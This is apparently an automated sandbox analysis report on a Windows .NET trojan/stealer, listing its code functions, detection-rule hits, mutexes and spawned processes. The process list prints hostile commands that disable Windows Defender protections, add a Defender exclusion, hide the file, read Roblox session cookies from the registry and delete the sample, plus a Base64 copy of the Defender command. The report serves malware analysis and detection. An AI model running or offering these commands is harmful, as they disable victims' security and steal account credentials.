Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D085F2	0_2_00007FF887D085F2
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D06DF0	0_2_00007FF887D06DF0
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D01D68	0_2_00007FF887D01D68
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887CF74A1	0_2_00007FF887CF74A1
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D0A3E3	0_2_00007FF887D0A3E3
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887CFE3E5	0_2_00007FF887CFE3E5
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887CF8395	0_2_00007FF887CF8395
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D06350	0_2_00007FF887D06350
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D08348	0_2_00007FF887D08348
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D06328	0_2_00007FF887D06328
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D06AF0	0_2_00007FF887D06AF0
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D18AC0	0_2_00007FF887D18AC0
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D40208	0_2_00007FF887D40208
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D39A10	0_2_00007FF887D39A10
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D0518D	0_2_00007FF887D0518D
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D40190	0_2_00007FF887D40190
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887CF8141	0_2_00007FF887CF8141
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D03164	0_2_00007FF887D03164
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D05158	0_2_00007FF887D05158
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D036C7	0_2_00007FF887D036C7
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D05610	0_2_00007FF887D05610
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887CF22B8	0_2_00007FF887CF22B8
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D0629D	0_2_00007FF887D0629D
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887CFDA08	0_2_00007FF887CFDA08
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887CFCA22	0_2_00007FF887CFCA22
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887CFC9D3	0_2_00007FF887CFC9D3
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887CFC970	0_2_00007FF887CFC970
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887D040F9	0_2_00007FF887D040F9
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EC70C2	0_2_00007FF887EC70C2
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EC50C1	0_2_00007FF887EC50C1
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EBDC9F	0_2_00007FF887EBDC9F
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EC3C2B	0_2_00007FF887EC3C2B
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EBCC2E	0_2_00007FF887EBCC2E
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EC8BF2	0_2_00007FF887EC8BF2
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EB1B98	0_2_00007FF887EB1B98
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EB22C0	0_2_00007FF887EB22C0
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EB9A10	0_2_00007FF887EB9A10
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EBB1FE	0_2_00007FF887EBB1FE
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EBEDAD	0_2_00007FF887EBEDAD
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EB8043	0_2_00007FF887EB8043
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EC57A8	0_2_00007FF887EC57A8
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EB9B90	0_2_00007FF887EB9B90
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EC9385	0_2_00007FF887EC9385
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EB1338	0_2_00007FF887EB1338
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EC5B0E	0_2_00007FF887EC5B0E
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EBEAD8	0_2_00007FF887EBEAD8
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EBEAD0	0_2_00007FF887EBEAD0
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EBA6C2	0_2_00007FF887EBA6C2
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EBC6B2	0_2_00007FF887EBC6B2
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EBEA98	0_2_00007FF887EBEA98
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EB1271	0_2_00007FF887EB1271
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EC5E5C	0_2_00007FF887EC5E5C
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EBFE11	0_2_00007FF887EBFE11
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EB1215	0_2_00007FF887EB1215
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EB0DF0	0_2_00007FF887EB0DF0
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EBC1CF	0_2_00007FF887EBC1CF
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EB19AD	0_2_00007FF887EB19AD
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EC3D30	0_2_00007FF887EC3D30
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EC5D2D	0_2_00007FF887EC5D2D
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887ECAD22	0_2_00007FF887ECAD22
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887EBE900	0_2_00007FF887EBE900
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887CFA8D0	0_2_00007FF887CFA8D0
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887CFA656	0_2_00007FF887CFA656
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Code function: 0_2_00007FF887CF7AD5	0_2_00007FF887CF7AD5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FF887DB30E9	4_2_00007FF887DB30E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF887DE3292	7_2_00007FF887DE3292

Source: WE8zqotCFj.exe, 00000000.00000000.1349066156.0000023284AD2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename vs WE8zqotCFj.exe
Source: WE8zqotCFj.exe	Binary or memory string: OriginalFilename vs WE8zqotCFj.exe

Source: WE8zqotCFj.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: WE8zqotCFj.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.0.WE8zqotCFj.exe.23284ad0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI

Source: WE8zqotCFj.exe, -.cs	Base64 encoded string: 'rHJbsipR/raZHBEA0vRw5SbjjuroI0r3A2l5pY4d2ge2sqAyE04xW9zVF3NJ55TV2oiTGOTnoatnkS5jlR7W4ShHY3PphwqZclN/pBUi1/iix27LYOD6OiLz3it97VJawWSjmEH8Vfmu5vNaBNwTdKmGmLxcFVtWvKet2+wdCVJ+ssS0v7EtWzA='
Source: WE8zqotCFj.exe, -----.cs	Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'

Source: classification engine

Classification label: mal100.troj.adwa.spyw.evad.winEXE@37/22@2/2

Source: C:\Users\user\Desktop\WE8zqotCFj.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WE8zqotCFj.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1912:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1544:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7700:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4712:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3632:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2008:120:WilError_03
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Mutant created: \Sessions\1\BaseNamedObjects\6iM001bCAof7uJG2C6x9
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4324:120:WilError_03

Source: C:\Users\user\Desktop\WE8zqotCFj.exe

File created: C:\Users\user\AppData\Local\Temp\Fke9TkbC12tBAtr

Jump to behavior

Source: WE8zqotCFj.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: WE8zqotCFj.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\WE8zqotCFj.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\WE8zqotCFj.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: WE8zqotCFj.exe, 00000000.00000002.2001936283.0000023287217000.00000004.00000800.00020000.00000000.sdmp, WE8zqotCFj.exe, 00000000.00000002.2001936283.00000232871AA000.00000004.00000800.00020000.00000000.sdmp, tCNRrHNzf8UQ4tL.0.dr, ncfNQ8Gp2TF2RzX.0.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: WE8zqotCFj.exe	ReversingLabs: Detection: 78%
Source: WE8zqotCFj.exe	Virustotal: Detection: 83%

Source: unknown	Process created: C:\Users\user\Desktop\WE8zqotCFj.exe "C:\Users\user\Desktop\WE8zqotCFj.exe"
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\WE8zqotCFj.exe"
Source: C:\Windows\System32\attrib.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WE8zqotCFj.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\WE8zqotCFj.exe" && pause
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\WE8zqotCFj.exe"	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WE8zqotCFj.exe'	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\WE8zqotCFj.exe" && pause	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost

Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\WE8zqotCFj.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
